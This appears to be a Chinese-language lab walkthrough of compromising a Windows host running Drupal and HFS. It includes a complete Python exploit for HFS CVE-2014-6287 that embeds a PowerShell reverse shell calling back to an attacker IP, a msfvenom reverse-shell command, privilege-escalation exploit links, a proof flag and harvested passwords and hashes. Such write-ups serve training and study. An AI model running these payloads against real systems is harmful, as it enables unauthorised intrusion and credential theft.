对其进行端口扫描

Pasted_image_20240731220804.png

发现是Drupal 7的版本,使用 droopescan scan drupal -u http://10.11.1.50/  进行扫描
Pasted_image_20240731220927.png

发现网上的payload均为sql inject,然而网站不支持POST方法
通过再次全端口扫描,发现了一个新端口:
Pasted_image_20240731221011.png

可以发现是HFS文件服务器
Pasted_image_20240731221128.png

通过查看Alice's Stuff文件夹中的文件,获取了几个用户名:AnnLeeBethanyNickPedro
Pasted_image_20240731221230.png

Bethany's Files文件夹中发现了密码/用户字典文件
Pasted_image_20240731221321.png

还有 Holiday_Locations.txt 文件
Pasted_image_20240731221357.png

使用HFS的命令执行漏洞 https://www.abotaku.cn/archives/108.html
Pasted_image_20240731221445.png

查看系统用户:
Pasted_image_20240731221523.png

读取HFS配置文件密码信息,无法进行解密
Pasted_image_20240731221606.png

使用命令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.212 LPORT=8780 -f exe -o reve.exe 生成反弹马
先下载文件
Pasted_image_20240731221700.png

可以看到已经下载完成了
Pasted_image_20240731221751.png

使用下面的代码进行反弹shell 
# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 20/02/2021
# Exploit Author: Pergyz
# Vendor Homepage: http://www.rejetto.com/hfs/
# Software Link: https://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Microsoft Windows Server 2012 R2 Standard
# CVE : CVE-2014-6287
# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands
 
 
#!/usr/bin/python3
 
 
import base64
import os
import urllib.request
import urllib.parse
 
lhost = "192.168.45.196"
lport = 80
rhost = "10.11.1.50"
rport = 9505
 
# Define the command to be written to a file
command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (Invoke-Expression $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (Get-Location).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()'
 
# Encode the command in base64 format
encoded_command = base64.b64encode(command.encode("utf-16le")).decode()
print("\nEncoded the command in base64 format...")
 
# Define the payload to be included in the URL
payload = f'exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}'
 
 
# Encode the payload and send a HTTP GET request
encoded_payload = urllib.parse.quote_plus(payload)
url = f'http://{rhost}:{rport}/?search=%00{{.{encoded_payload}.}}'
urllib.request.urlopen(url)
print("\nEncoded the payload and sent a HTTP GET request to the target...")
 
 
# Print some information
print("\nPrinting some information for debugging...")
print("lhost: ", lhost)
print("lport: ", lport)
print("rhost: ", rhost)
print("rport: ", rport)
print("payload: ", payload)
 
# Listen for connections
print("\nListening for connection...")
os.system(f'nc -nlvp {lport}')

接收到了反弹的shell

Pasted_image_20240731221858.png

安装了100多个补丁
Pasted_image_20240731221934.png

使用CVE-2019-1458进行提权 https://github.com/unamer/CVE-2019-1458
Pasted_image_20240731222012.png

坑爹的是只能运行一次
Pasted_image_20240731222046.png

使用另一个CVE-2017-0213提权 https://github.com/zcgonvh/CVE-2017-0213
Pasted_image_20240731222548.png

获取到了proof.txt文件内容:1f1f1eb58e44d5d24e44070b3b29c0d5
Pasted_image_20240731222650.png

搜集

搜集到的账号密码信息:
账号 哈希 密码
Administrator 31d6cfe0d16ae931b73c59d7e0c089c0 [空密码]
alice b74242f37e47371aff835a6ebcac4ffe aliceishere
Bethany 15a32e36e8612d886be1b8981d9679ee ihavepasswords3